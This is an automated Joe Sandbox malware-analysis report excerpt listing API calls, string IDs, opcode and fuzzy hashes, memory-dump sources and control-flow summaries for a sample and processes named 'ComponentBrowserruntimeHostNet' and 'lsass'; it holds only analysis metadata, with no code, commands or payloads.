                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: Thread$CreatePriority__vswprintf_c_l
                                        • String ID: CreateThread failed
                                        • API String ID: 2655393344-3849766595
                                        • Opcode ID: 1e2a3ab5fda4057ed384c8e881daa1649d8a61f976baf57ba482bb231ab7dbd7
                                        • Instruction ID: 657636f02c7cb9f69fdf5d5951da4da4554cd132cd8e7b25e7f628ccec60a341
                                        • Opcode Fuzzy Hash: 1e2a3ab5fda4057ed384c8e881daa1649d8a61f976baf57ba482bb231ab7dbd7
                                        • Instruction Fuzzy Hash: 1B01DBB53443496FD3305E789C51F7673D8EB41751F1008AEF64667281CEE1AC858624
                                        APIs
                                          • Part of subcall function 00BBE2E8: _swprintf.LIBCMT ref: 00BBE30E
                                          • Part of subcall function 00BBE2E8: _strlen.LIBCMT ref: 00BBE32F
                                          • Part of subcall function 00BBE2E8: SetDlgItemTextW.USER32(?,00BEE274,?), ref: 00BBE38F
                                          • Part of subcall function 00BBE2E8: GetWindowRect.USER32(?,?), ref: 00BBE3C9
                                          • Part of subcall function 00BBE2E8: GetClientRect.USER32(?,?), ref: 00BBE3D5
                                        • GetDlgItem.USER32(00000000,00003021), ref: 00BB135A
                                        • SetWindowTextW.USER32(00000000,00BE35F4), ref: 00BB1370
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                        • String ID: 0
                                        • API String ID: 2622349952-4108050209
                                        • Opcode ID: cce4a9f15b3f6afab894f6e2d8e70aae603b3ee372dd1d5f859264cefbb8c39e
                                        • Instruction ID: 184d149ada306ac04a52f883ea6e921c990a72f149dd299c2876d614e005b491
                                        • Opcode Fuzzy Hash: cce4a9f15b3f6afab894f6e2d8e70aae603b3ee372dd1d5f859264cefbb8c39e
                                        • Instruction Fuzzy Hash: ECF08C3010428CBBDF150F68881DBFE3BE8EF02348F448994FD44515A1EBB5C994AB28
                                        APIs
                                        • WaitForSingleObject.KERNEL32(?,000000FF,00BC1206,?), ref: 00BC0FEA
                                        • GetLastError.KERNEL32(?), ref: 00BC0FF6
                                          • Part of subcall function 00BB6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BB6C54
                                        Strings
                                        • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00BC0FFF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                        • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                        • API String ID: 1091760877-2248577382
                                        • Opcode ID: 991cf95970a5915a7f7bd17d7d34854fc81e1aff35a769efaf440079bc86483e
                                        • Instruction ID: 8dc6682411a1a3a51be58591e63fd81e7d032e6454222f589229a94102c21179
                                        • Opcode Fuzzy Hash: 991cf95970a5915a7f7bd17d7d34854fc81e1aff35a769efaf440079bc86483e
                                        • Instruction Fuzzy Hash: 12D02B3250816077C61033395C09EBE3D84CB12731B600F94F139672F3CF244D814695
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000,?,00BBDA55,?), ref: 00BBE2A3
                                        • FindResourceW.KERNEL32(00000000,RTL,00000005,?,00BBDA55,?), ref: 00BBE2B1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: FindHandleModuleResource
                                        • String ID: RTL
                                        • API String ID: 3537982541-834975271
                                        • Opcode ID: 1ed96d8722783932835121511d19e3a405b759837e962f56224913b56d9d5afd
                                        • Instruction ID: bb53bf8b3c81617eea0614aba835d040dc8c734660fac14885ab30a30e728435
                                        • Opcode Fuzzy Hash: 1ed96d8722783932835121511d19e3a405b759837e962f56224913b56d9d5afd
                                        • Instruction Fuzzy Hash: 4EC0123124079066EA3067756C8DB9B6AD89B00F21F09049CB281EF2E2DAE5C98086A0

                                        Execution Graph

                                        Execution Coverage:6.9%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:0%
                                        Total number of Nodes:3
                                        Total number of Limit Nodes:0
                                        execution_graph 8495 7ffd9be9a071 8496 7ffd9be9a08f QueryFullProcessImageNameA 8495->8496 8498 7ffd9be9a234 8496->8498

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 170 7ffd9baa0d47-7ffd9baa0d9b call 7ffd9baa07c0 173 7ffd9baa0da0-7ffd9baa0e9e 170->173 187 7ffd9baa0e9f-7ffd9baa0eb9 173->187 189 7ffd9baa0ebb-7ffd9baa0f05 187->189 193 7ffd9baa0f07-7ffd9baa0f1d 189->193 194 7ffd9baa0f1e 189->194 195 7ffd9baa0f1f-7ffd9baa0ff1 193->195 194->195 200 7ffd9baa1050 195->200 201 7ffd9baa0ff3-7ffd9baa104f 195->201 201->200
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1768816812.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ffd9baa0000_ComponentBrowserruntimeHostNet.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 5[_H
                                        • API String ID: 0-3279724263
                                        • Opcode ID: c2cdd3b7d7f826cbb0058dd61ba7944d17528a75e31a19629cf8aafefcdef926
                                        • Instruction ID: 909a43b81ae2b14986249eebf42a8744ba1b848c22867ea552cbbb89f4c0f4fa
                                        • Opcode Fuzzy Hash: c2cdd3b7d7f826cbb0058dd61ba7944d17528a75e31a19629cf8aafefcdef926
                                        • Instruction Fuzzy Hash: AE910371A09A8D4FE799DB6888797A97FE2FF95310F4001BED049D72E6CBB82811C750

                                        Control-flow Graph

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1770937204.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ffd9be90000_ComponentBrowserruntimeHostNet.jbxd
                                        Similarity
                                        • API ID: FullImageNameProcessQuery
                                        • String ID:
                                        • API String ID: 3578328331-0
                                        • Opcode ID: ffac51cbc4976fd0b17c79a6bf57812202fa5b0c1063ac73392f1c38442e8294
                                        • Instruction ID: 90767c882dd182ce1d504130d2801b832656a570a2f30549184d79106dbebaef
                                        • Opcode Fuzzy Hash: ffac51cbc4976fd0b17c79a6bf57812202fa5b0c1063ac73392f1c38442e8294
                                        • Instruction Fuzzy Hash: 7171A030619A8C8FDB68DF2888597F977E1FF59311F00427EE84EC7292CB75A9458B81

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 265 7ffd9bc01dba-7ffd9bc01df4 270 7ffd9bc01dff-7ffd9bc02725 265->270
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1769600921.00007FFD9BC00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ffd9bc00000_ComponentBrowserruntimeHostNet.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 926395d0c25bf100aa683f6cb8f64a1a18fbfaa54f511b0fb65a4892f9e2361f
                                        • Instruction ID: a14a495a7dd3c9e09f81ebeb2dde018f011eba4e105d4d265cb4b3878f575146
                                        • Opcode Fuzzy Hash: 926395d0c25bf100aa683f6cb8f64a1a18fbfaa54f511b0fb65a4892f9e2361f
                                        • Instruction Fuzzy Hash: BF528271A1DA594FDFA8EB58C8A5AA8B7F1FF68350F0401E9E04DC7292CA357D81CB41
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1768816812.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ffd9baa0000_ComponentBrowserruntimeHostNet.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 70483c479748fef48de928f792627fde3059cadce1e3344f80f536751064c9b3
                                        • Instruction ID: cf97b313f1641ba2576b6c018af44bc799c11dabe81358f401bd68ce389fc506
                                        • Opcode Fuzzy Hash: 70483c479748fef48de928f792627fde3059cadce1e3344f80f536751064c9b3
                                        • Instruction Fuzzy Hash: B2415812B0C9590EE318F77CA4B9AF97781EF9933AB0405BBE44ECB1D7CD14A881C280
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1768816812.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ffd9baa0000_ComponentBrowserruntimeHostNet.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5e8b64b3668c4fd948b335103ad9814d0baead3758870f88a2b441810ece77ee
                                        • Instruction ID: f16f21e74887b19a088ca7d5b92b78f5f6f40d877fadd6f6a1036fd09ccae13b
                                        • Opcode Fuzzy Hash: 5e8b64b3668c4fd948b335103ad9814d0baead3758870f88a2b441810ece77ee
                                        • Instruction Fuzzy Hash: AC411822B0C9590EE318F77CA4AA9F877C1EF5933AB1445BBE44ECB1D7DD14A841C284
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1768816812.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ffd9baa0000_ComponentBrowserruntimeHostNet.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6a56677db1ca8f35d5f0db940f67885e8e8c58c9cbdc610d48ee542fcebc08be
                                        • Instruction ID: 3cb536d9bb471e65f8624faa052adf71fd4cacd8948e9e5107a84adbbde9300a
                                        • Opcode Fuzzy Hash: 6a56677db1ca8f35d5f0db940f67885e8e8c58c9cbdc610d48ee542fcebc08be
                                        • Instruction Fuzzy Hash: F931F521B1C9190FE368F76C646AAF973C2DF5832AF5045BBE40EC72E7DD18AC418294
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1768816812.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ffd9baa0000_ComponentBrowserruntimeHostNet.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e08e5b435923eb877a29c5650f43a3c3e760c18d010e4ae0bafee9ac366f348b
                                        • Instruction ID: 71e3ca8899a0fa06e5ad7c2763d892f7c6a163ed7144c2432b32a11a0977166a
                                        • Opcode Fuzzy Hash: e08e5b435923eb877a29c5650f43a3c3e760c18d010e4ae0bafee9ac366f348b
                                        • Instruction Fuzzy Hash: 26213421B1895D0FE79CF76C946EA7972C3EF98324F9004BAE40EC32E7DD54AC428291
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1768816812.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ffd9baa0000_ComponentBrowserruntimeHostNet.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 99b0bcd1f3fc8372a06d709e5e7a10dfd24fe91f58af2e23a1e6b671c003657f
                                        • Instruction ID: 5bc38230dc4480a22edf620031fe9e4d437d6a8782cfa65fedf0a04d9d863ead
                                        • Opcode Fuzzy Hash: 99b0bcd1f3fc8372a06d709e5e7a10dfd24fe91f58af2e23a1e6b671c003657f
                                        • Instruction Fuzzy Hash: 9B210736B0D64D8AE732ABA898510DC7B60EF81325F0545B3D04CCF1D3D968264AC7A5
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1768816812.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ffd9baa0000_ComponentBrowserruntimeHostNet.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 585011ca9e5b3083aaae3c1fb4e9b71dfdb6fde84943405d5deb15928806df1d
                                        • Instruction ID: f8459353b2f853158c0f66784987d2b5f305d3b060a9a6a12f596c5e13bf3b3f
                                        • Opcode Fuzzy Hash: 585011ca9e5b3083aaae3c1fb4e9b71dfdb6fde84943405d5deb15928806df1d
                                        • Instruction Fuzzy Hash: 56119420F0A90E4FEBB4EB9888746B876E3EF58711F1142B6C40DD32B1DD68AE448B50
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1768816812.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ffd9baa0000_ComponentBrowserruntimeHostNet.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d28d277057d36eb67845eec8069c46d6d99253bb9a672f197332ccbdb199aa34
                                        • Instruction ID: e3ca8fa6d0921ed3253570a76162bdd21165d4e4faa083d7e74e2c3e33cd49aa
                                        • Opcode Fuzzy Hash: d28d277057d36eb67845eec8069c46d6d99253bb9a672f197332ccbdb199aa34
                                        • Instruction Fuzzy Hash: 0011C635B0E68D8FE731DFA8886519C7FB1EF42711F0645F7C088DB1A2D574164987A4
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1768816812.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ffd9baa0000_ComponentBrowserruntimeHostNet.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a1210c6f149a47f69fc02331fd5050f2dfcaf026f31ca9fd447148f2ccc0831b
                                        • Instruction ID: 360ea816e2c7504f28c4fdf7306e062410b670ba00d8739fdd3db69be8d41542
                                        • Opcode Fuzzy Hash: a1210c6f149a47f69fc02331fd5050f2dfcaf026f31ca9fd447148f2ccc0831b
                                        • Instruction Fuzzy Hash: A0010435B0E38C8FE722DFA8886419CBFB1EF42710F0645F7C088CB1A2D97426498764
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1768816812.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ffd9baa0000_ComponentBrowserruntimeHostNet.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 21e248a75c2e273f4603a18c1a9537183bac33b2f34bc6df16b895e85e6d6ea2
                                        • Instruction ID: a52fbe26b185d13e4d8e27cd550f7553d3d6c37aaf294614e4ff3da344bb538d
                                        • Opcode Fuzzy Hash: 21e248a75c2e273f4603a18c1a9537183bac33b2f34bc6df16b895e85e6d6ea2
                                        • Instruction Fuzzy Hash: C711B13190496C8FDBA8DB04C894B9D77B1EB58301F1585AED40EE72A0CA75AE85CB85
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1768816812.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ffd9baa0000_ComponentBrowserruntimeHostNet.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d12f4620f475cc0f2373907d8cfd15450661b6f595f34a5d627a98fd5cbfabb7
                                        • Instruction ID: 0842613c28fa6246b685083414a53d6f204e5d264d6e372224b1afbf9384dd7f
                                        • Opcode Fuzzy Hash: d12f4620f475cc0f2373907d8cfd15450661b6f595f34a5d627a98fd5cbfabb7
                                        • Instruction Fuzzy Hash: B5019235A0E38D9FD721DFA4885419CBFB1EF42710F1641E7D088DB1A2D9746645C754
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1768816812.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ffd9baa0000_ComponentBrowserruntimeHostNet.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1aedc15860473d66294bcd7d30928d416fab4d432e3251ec394bf809f57ce886
                                        • Instruction ID: 2b5f8539aa83c294907a52e2e8c51086a76859ff4927a3d2ed4f1cf29778dfe4
                                        • Opcode Fuzzy Hash: 1aedc15860473d66294bcd7d30928d416fab4d432e3251ec394bf809f57ce886
                                        • Instruction Fuzzy Hash: B701BC34A0E38D9FE721DBA488A419CBFB1AF02700F1541E7C088CB1A2D9782A448754
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1768816812.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ffd9baa0000_ComponentBrowserruntimeHostNet.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4eb1ffb5accd51ad36bdc4814720d1f5197c5ab215985cd5784c1b037849105d
                                        • Instruction ID: 0a2fa89e7e0d5747494ddef0842e7392d38e43ee3c4e0df416cc6856fdda74ef
                                        • Opcode Fuzzy Hash: 4eb1ffb5accd51ad36bdc4814720d1f5197c5ab215985cd5784c1b037849105d
                                        • Instruction Fuzzy Hash: D7F0E630B0A91E8AEBB4DB54CC547B873A2EF54311F1141B6C40ED31B1DEB86EC58B54
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1768816812.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ffd9baa0000_ComponentBrowserruntimeHostNet.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 09bed51a84c8659b2e94871270fad55b8b9426c8566189d6f2baa9fe026836bc
                                        • Instruction ID: 5a485b8274835d9c3335894b93f793446f39198f4132d1a56ab01eaaa1494254
                                        • Opcode Fuzzy Hash: 09bed51a84c8659b2e94871270fad55b8b9426c8566189d6f2baa9fe026836bc
                                        • Instruction Fuzzy Hash: 49F0553560DA4ACFDB40AB38ECA18D0BB60EB46208B5611EAC088C70A3E250195CC700
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1768816812.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ffd9baa0000_ComponentBrowserruntimeHostNet.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 620c400f58104c25ee72f0295a701db363e685c0fd8beffa55c38e5a76923487
                                        • Instruction ID: 94a44058782c04311fa8ec512bb0c1704cef5a4e1f9f533843700eb2b5e94c0a
                                        • Opcode Fuzzy Hash: 620c400f58104c25ee72f0295a701db363e685c0fd8beffa55c38e5a76923487
                                        • Instruction Fuzzy Hash: 55F05420B0A50E4AEBB4DB84C8A46B97393EF54311F114176C40ED71F2CE696E458A50
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1768816812.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ffd9baa0000_ComponentBrowserruntimeHostNet.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 33ce092d330706656787fe6c1980c23132291f1bbc9d9feda2edb2cb72a22dcb
                                        • Instruction ID: e6345f37c77d078c8dff598482f6ca69cc302ba28a0d1fc8aa3ae9b7608c4101
                                        • Opcode Fuzzy Hash: 33ce092d330706656787fe6c1980c23132291f1bbc9d9feda2edb2cb72a22dcb
                                        • Instruction Fuzzy Hash: 68E09231B0851A8BF7299744C8B07B873A6EB94300F1641BCD94FD36F1DDB8AE018699
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1768816812.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ffd9baa0000_ComponentBrowserruntimeHostNet.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 01e38e70d1fa6bb65dd097346d22abdbea730342f4aa22208da91687ed01f3b5
                                        • Instruction ID: 9a2e969648b5b8e455ef805bf44c71f79e16c2b759d97fefd7bf251fb2ed1667
                                        • Opcode Fuzzy Hash: 01e38e70d1fa6bb65dd097346d22abdbea730342f4aa22208da91687ed01f3b5
                                        • Instruction Fuzzy Hash: 65C00205F5B51E01E53573EA54660BDA2425BD5E54FD70172D50C800A198DD22D9026A
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1768816812.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ffd9baa0000_ComponentBrowserruntimeHostNet.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9f3e7c0902c0bdd17eb81eaba75847c45b3ad70e399ecfffc7f22d09021e1c50
                                        • Instruction ID: eb3d624e4cc36ede64214407ee54c28e5e1c9dfbdf23bf80e027ab142760ea74
                                        • Opcode Fuzzy Hash: 9f3e7c0902c0bdd17eb81eaba75847c45b3ad70e399ecfffc7f22d09021e1c50
                                        • Instruction Fuzzy Hash: 26C08C01F0881A12F25E2308143263D08038F4461CFE58074E82EC63CECE0C1B0102C2
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1768816812.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ffd9baa0000_ComponentBrowserruntimeHostNet.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bfec55d506deb6a0e66d98d92f25c69081eec8d6f86558604ed38352e00b2f3f
                                        • Instruction ID: 23c1ab6935c2875efbf1a70c7ea36ce8b5266d16010fde7bd8eb8d4906734a1f
                                        • Opcode Fuzzy Hash: bfec55d506deb6a0e66d98d92f25c69081eec8d6f86558604ed38352e00b2f3f
                                        • Instruction Fuzzy Hash: B0B01200D5740F00E43433FA089207970415B44200FC20070D40C8009198CD32D80367
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1768816812.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ffd9baa0000_ComponentBrowserruntimeHostNet.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: c9$!k9$"s9$#{9
                                        • API String ID: 0-1692736845
                                        • Opcode ID: f55fb42346b907c0464accb34b153e20408966f01eb438533c853ee5b221f10f
                                        • Instruction ID: b33f58bc7fd9925b00184f98466e5a05b79c2144674a0d83844a67e63aec78ad
                                        • Opcode Fuzzy Hash: f55fb42346b907c0464accb34b153e20408966f01eb438533c853ee5b221f10f
                                        • Instruction Fuzzy Hash: 4141CD17B0842745E239B3FD78219E95B408FA823FB0847B3F55E8D0C78C082486C2E9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1907131494.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7ffd9ba90000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 5\_H
                                        • API String ID: 0-3325266018
                                        • Opcode ID: 0e8d6b20cbdb0bd00163ae68cdad9b509578d468b3a7d343dc465d525992ff84
                                        • Instruction ID: 810952504fa6c7667de3a56bed5c1a09fafcdfc4efa245a4b7fc5f9781e992db
                                        • Opcode Fuzzy Hash: 0e8d6b20cbdb0bd00163ae68cdad9b509578d468b3a7d343dc465d525992ff84
                                        • Instruction Fuzzy Hash: 70910872A0DA8D8FE759DB688875BAABFE1FF59310F0501AED049D72E6DB781410CB00
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID: 0-3916222277
                                        • Opcode ID: aef9e3fb6e94278347f8599cb3311bf425a0f41135aa1fd88f1862f51d72c59b
                                        • Instruction ID: d2063e097b44de2679b46df32e7751dfa298d6052fbaf73ea1859a189cd80bca
                                        • Opcode Fuzzy Hash: aef9e3fb6e94278347f8599cb3311bf425a0f41135aa1fd88f1862f51d72c59b
                                        • Instruction Fuzzy Hash: 5F518231E09A4E8FDB5ADB98C4615FDBBB1FF44304F1141BAE02AE72D2DA396901CB40
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: M
                                        • API String ID: 0-3664761504
                                        • Opcode ID: 78773f2e1a43873d24b22663fa03778f27ef70323f4acee6c5f82ca2f39c1fa3
